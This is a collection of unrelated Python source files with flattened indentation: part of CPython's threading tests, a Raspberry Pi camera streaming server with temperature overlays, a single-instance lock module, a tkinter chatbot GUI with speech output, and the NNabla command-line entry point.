# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import datetime as dt
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
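# For reference: StreamingWebSocket.opened() below greets each client with an
# 8-byte stream header -- the 4-byte magic followed by big-endian uint16 width
# and height. With the defaults above:
#
#   JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT)
#   # -> b'jsmp\x02\x80\x01\xe0'   (640 = 0x0280, 480 = 0x01e0)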
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif self.path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif self.path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
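        # ffmpeg reads raw YUV420 frames on stdin (fed by main() via
        # camera.start_recording(output, 'yuv') -> self.write()) and writes an
        # ~800 kbps MPEG1 elementary stream to stdout, which BroadcastThread
        # relays to every connected websocket client.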
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def cpu_temp():
    # vcgencmd prints e.g. "temp=47.2'C\n"; return just the value, without the
    # trailing newline that would otherwise add a blank line to the overlay.
    temp = os.popen("vcgencmd measure_temp").readline()
    return temp.replace("temp=", "").strip()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
overlayString = ""
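                # Each DS18B20 w1_slave file ends with "t=<millidegrees C>"
                # (e.g. "... t=23125"); take the last token, drop the "t=",
                # and divide by 1000 to get degrees Celsius.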
tfile = open("/sys/bus/w1/devices/w1_bus_master1/28-0417837f42ff/w1_slave")
text1 = tfile.read()
tfile.close()
tempdata1 = text1.split()[-1]
temp1 = float(tempdata1[2:])
temp1 = temp1 / 1000
temp1 = '%6.2f'%temp1
tfile2 = open("/sys/bus/w1/devices/w1_bus_master1/28-0517908cbdff/w1_slave")
text2 = tfile2.read()
tfile2.close()
tempdata2 = text2.split()[-1]
temp2 = float(tempdata2[2:])
temp2 = temp2 / 1000
temp2 = '%6.2f'%temp2
tfile3 = open("/sys/bus/w1/devices/w1_bus_master1/28-051790b51aff/w1_slave")
text3 = tfile3.read()
tfile3.close()
tempdata3 = text3.split()[-1]
temp3 = float(tempdata3[2:])
temp3 = temp3 / 1000
temp3 = '%6.2f'%temp3
camera.annotate_text_size = 20
overlayString += 'BED1: '+str(temp1)+'C'
overlayString += ' ROOM: '+str(temp2)+'C'
overlayString += ' BED2: '+str(temp3)+'C'
overlayString += ' CPU '+str(cpu_temp())
overlayString += '\n'+dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
camera.annotate_text = overlayString
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
singleton.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# ----------------------------------------
# Ensure that only one instance of a program is running,
# e.g. to keep crontab from starting two instances of the same program.
#
# Usage:
# >>> import singleton
# >>> lockfile = "/tmp/<app>.lock"
# >>> instance = singleton.SingleInstance(lockfile)
# will sys.exit(-1) if other instance is running
#
# References:
# http://stackoverflow.com/questions/380870/python-single-instance-of-program
# https://github.com/ssbarnea/tendo/blob/master/tendo/singleton.py
# ----------------------------------------
import sys
import unittest
import fcntl
class SingleInstance(object):
"""
    If you want to prevent your script from running in parallel, just
    instantiate the SingleInstance() class. If another instance is already
    running, the constructor exits the application via sys.exit(-1).
    This option is very useful if you have scripts executed by crontab
    at short intervals.
    Remember that this works by taking an exclusive, non-blocking fcntl
    lock on the lock file whose path you pass in.
"""
def __init__(self, lockfile):
self.lockfile = lockfile
self.fp = open(self.lockfile, 'w')
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
sys.exit(-1)
def __str__(self):
return "SingleInstance with lock file: %s" % self.lockfile
test_lock_file = "/tmp/test_lock_file.lock"
def f():
instance = SingleInstance(test_lock_file)
print instance
class testSingleton(unittest.TestCase):
def test_1(self):
instance = SingleInstance(test_lock_file)
print instance
def test_2(self):
from multiprocessing import Process
instance = SingleInstance(test_lock_file)
print instance
p = Process(target=f)
p.start()
p.join()
# the called function should fail because we already have another
# instance running note, we return -1 but this translates to 255
# meanwhile we'll consider that anything different from 0 is good
print p.exitcode
assert(not p.exitcode == 0)
if __name__ == "__main__":
unittest.main()
|
gui.py
|
from tkinter import *
import time
import tkinter.messagebox
from bot import chat
import pyttsx3
import threading
saved_username = ["You"]
window_size="400x400"
class ChatInterface(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
# sets default bg for top level windows
self.tl_bg = "#EEEEEE"
self.tl_bg2 = "#EEEEEE"
self.tl_fg = "#000000"
self.font = "Verdana 10"
menu = Menu(self.master)
self.master.config(menu=menu, bd=5)
# Menu bar
# File
file = Menu(menu, tearoff=0)
menu.add_cascade(label="File", menu=file)
file.add_command(label="Clear Chat", command=self.clear_chat)
file.add_command(label="Exit",command=self.chatexit)
# Options
options = Menu(menu, tearoff=0)
menu.add_cascade(label="Options", menu=options)
# username
# font
font = Menu(options, tearoff=0)
options.add_cascade(label="Font", menu=font)
font.add_command(label="Default",command=self.font_change_default)
font.add_command(label="Times",command=self.font_change_times)
font.add_command(label="System",command=self.font_change_system)
font.add_command(label="Helvetica",command=self.font_change_helvetica)
font.add_command(label="Fixedsys",command=self.font_change_fixedsys)
# color theme
color_theme = Menu(options, tearoff=0)
options.add_cascade(label="Color Theme", menu=color_theme)
color_theme.add_command(label="Default",command=self.color_theme_default)
color_theme.add_command(label="Grey",command=self.color_theme_grey)
color_theme.add_command(label="Blue",command=self.color_theme_dark_blue)
color_theme.add_command(label="Torque",command=self.color_theme_turquoise)
color_theme.add_command(label="Hacker",command=self.color_theme_hacker)
self.text_frame = Frame(self.master, bd=6)
self.text_frame.pack(expand=True, fill=BOTH)
# scrollbar for text box
self.text_box_scrollbar = Scrollbar(self.text_frame, bd=0)
self.text_box_scrollbar.pack(fill=Y, side=RIGHT)
# contains messages
self.text_box = Text(self.text_frame, yscrollcommand=self.text_box_scrollbar.set, state=DISABLED,
bd=1, padx=6, pady=6, spacing3=8, wrap=WORD, bg=None, font="Verdana 10", relief=GROOVE,
width=10, height=1)
self.text_box.pack(expand=True, fill=BOTH)
self.text_box_scrollbar.config(command=self.text_box.yview)
# frame containing user entry field
self.entry_frame = Frame(self.master, bd=1)
self.entry_frame.pack(side=LEFT, fill=BOTH, expand=True)
# entry field
self.entry_field = Entry(self.entry_frame, bd=1, justify=LEFT)
self.entry_field.pack(fill=X, padx=6, pady=6, ipady=3)
# frame containing send button and emoji button
self.send_button_frame = Frame(self.master, bd=0)
self.send_button_frame.pack(fill=BOTH)
# send button
self.send_button = Button(self.send_button_frame, text="Send", width=5, relief=GROOVE, bg='white',
bd=1, command=lambda: self.send_message_insert(None), activebackground="#FFFFFF",
activeforeground="#000000")
self.send_button.pack(side=LEFT, ipady=8)
self.master.bind("<Return>", self.send_message_insert)
self.last_sent_label(date="No messages sent.")
    def playResponce(self, responce):
        # Speak the bot's reply with pyttsx3; invoked on a worker thread from
        # send_message_insert() so speaking does not freeze the GUI.
        x = pyttsx3.init()
        x.setProperty('rate', 120)
        x.setProperty('volume', 1.0)  # pyttsx3 expects volume in the range 0.0-1.0
        x.say(responce)
        x.runAndWait()
def last_sent_label(self, date):
try:
self.sent_label.destroy()
except AttributeError:
pass
self.sent_label = Label(self.entry_frame, font="Verdana 7", text=date, bg=self.tl_bg2, fg=self.tl_fg)
self.sent_label.pack(side=LEFT, fill=X, padx=3)
def clear_chat(self):
self.text_box.config(state=NORMAL)
self.last_sent_label(date="No messages sent.")
self.text_box.delete(1.0, END)
self.text_box.delete(1.0, END)
self.text_box.config(state=DISABLED)
def chatexit(self):
exit()
def send_message_insert(self, message):
user_input = self.entry_field.get()
pr1 = "Human : " + user_input + "\n"
self.text_box.configure(state=NORMAL)
self.text_box.insert(END, pr1)
self.text_box.configure(state=DISABLED)
self.text_box.see(END)
ob=chat(user_input)
pr="PyBot : " + ob + "\n"
self.text_box.configure(state=NORMAL)
self.text_box.insert(END, pr)
self.text_box.configure(state=DISABLED)
self.text_box.see(END)
self.last_sent_label(str(time.strftime( "Last message sent: " + '%B %d, %Y' + ' at ' + '%I:%M %p')))
self.entry_field.delete(0,END)
time.sleep(0)
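        # Speak the reply on a background thread so the Tk mainloop (and thus
        # the UI) is not blocked while pyttsx3 runs.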
t2 = threading.Thread(target=self.playResponce, args=(ob,))
t2.start()
def font_change_default(self):
self.text_box.config(font="Verdana 10")
self.entry_field.config(font="Verdana 10")
self.font = "Verdana 10"
def font_change_times(self):
self.text_box.config(font="Times")
self.entry_field.config(font="Times")
self.font = "Times"
def font_change_system(self):
self.text_box.config(font="System")
self.entry_field.config(font="System")
self.font = "System"
def font_change_helvetica(self):
self.text_box.config(font="helvetica 10")
self.entry_field.config(font="helvetica 10")
self.font = "helvetica 10"
def font_change_fixedsys(self):
self.text_box.config(font="fixedsys")
self.entry_field.config(font="fixedsys")
self.font = "fixedsys"
def color_theme_default(self):
self.master.config(bg="#EEEEEE")
self.text_frame.config(bg="#EEEEEE")
self.entry_frame.config(bg="#EEEEEE")
self.text_box.config(bg="#FFFFFF", fg="#000000")
self.entry_field.config(bg="#FFFFFF", fg="#000000", insertbackground="#000000")
self.send_button_frame.config(bg="#EEEEEE")
self.send_button.config(bg="#FFFFFF", fg="#000000", activebackground="#FFFFFF", activeforeground="#000000")
self.sent_label.config(bg="#EEEEEE", fg="#000000")
self.tl_bg = "#FFFFFF"
self.tl_bg2 = "#EEEEEE"
self.tl_fg = "#000000"
# Dark
def color_theme_dark(self):
self.master.config(bg="#2a2b2d")
self.text_frame.config(bg="#2a2b2d")
self.text_box.config(bg="#212121", fg="#FFFFFF")
self.entry_frame.config(bg="#2a2b2d")
self.entry_field.config(bg="#212121", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#2a2b2d")
self.send_button.config(bg="#212121", fg="#FFFFFF", activebackground="#212121", activeforeground="#FFFFFF")
self.sent_label.config(bg="#2a2b2d", fg="#FFFFFF")
self.tl_bg = "#212121"
self.tl_bg2 = "#2a2b2d"
self.tl_fg = "#FFFFFF"
# Grey
def color_theme_grey(self):
self.master.config(bg="#444444")
self.text_frame.config(bg="#444444")
self.text_box.config(bg="#4f4f4f", fg="#ffffff")
self.entry_frame.config(bg="#444444")
self.entry_field.config(bg="#4f4f4f", fg="#ffffff", insertbackground="#ffffff")
self.send_button_frame.config(bg="#444444")
self.send_button.config(bg="#4f4f4f", fg="#ffffff", activebackground="#4f4f4f", activeforeground="#ffffff")
self.sent_label.config(bg="#444444", fg="#ffffff")
self.tl_bg = "#4f4f4f"
self.tl_bg2 = "#444444"
self.tl_fg = "#ffffff"
# Blue
def color_theme_dark_blue(self):
self.master.config(bg="#263b54")
self.text_frame.config(bg="#263b54")
self.text_box.config(bg="#1c2e44", fg="#FFFFFF")
self.entry_frame.config(bg="#263b54")
self.entry_field.config(bg="#1c2e44", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#263b54")
self.send_button.config(bg="#1c2e44", fg="#FFFFFF", activebackground="#1c2e44", activeforeground="#FFFFFF")
self.sent_label.config(bg="#263b54", fg="#FFFFFF")
self.tl_bg = "#1c2e44"
self.tl_bg2 = "#263b54"
self.tl_fg = "#FFFFFF"
# Torque
def color_theme_turquoise(self):
self.master.config(bg="#003333")
self.text_frame.config(bg="#003333")
self.text_box.config(bg="#669999", fg="#FFFFFF")
self.entry_frame.config(bg="#003333")
self.entry_field.config(bg="#669999", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#003333")
self.send_button.config(bg="#669999", fg="#FFFFFF", activebackground="#669999", activeforeground="#FFFFFF")
self.sent_label.config(bg="#003333", fg="#FFFFFF")
self.tl_bg = "#669999"
self.tl_bg2 = "#003333"
self.tl_fg = "#FFFFFF"
# Hacker
def color_theme_hacker(self):
self.master.config(bg="#0F0F0F")
self.text_frame.config(bg="#0F0F0F")
self.entry_frame.config(bg="#0F0F0F")
self.text_box.config(bg="#0F0F0F", fg="#33FF33")
self.entry_field.config(bg="#0F0F0F", fg="#33FF33", insertbackground="#33FF33")
self.send_button_frame.config(bg="#0F0F0F")
self.send_button.config(bg="#0F0F0F", fg="#FFFFFF", activebackground="#0F0F0F", activeforeground="#FFFFFF")
self.sent_label.config(bg="#0F0F0F", fg="#33FF33")
self.tl_bg = "#0F0F0F"
self.tl_bg2 = "#0F0F0F"
self.tl_fg = "#33FF33"
# Default font and color theme
def default_format(self):
self.font_change_default()
self.color_theme_default()
root=Tk()
a = ChatInterface(root)
root.geometry(window_size)
root.title("ConvBot")
root.iconbitmap('i.ico')
root.mainloop()
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
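    # _thread.stack_size() only affects threads created afterwards, so
    # cli_main is run on a fresh thread below to give it the 128 MB stack --
    # presumably so that, together with the huge recursion limit above,
    # deeply recursive processing does not overflow the default stack.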
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.func_info import add_function_info_command
add_function_info_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
from nnabla.utils.cli.draw_graph import add_draw_graph_command
add_draw_graph_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
|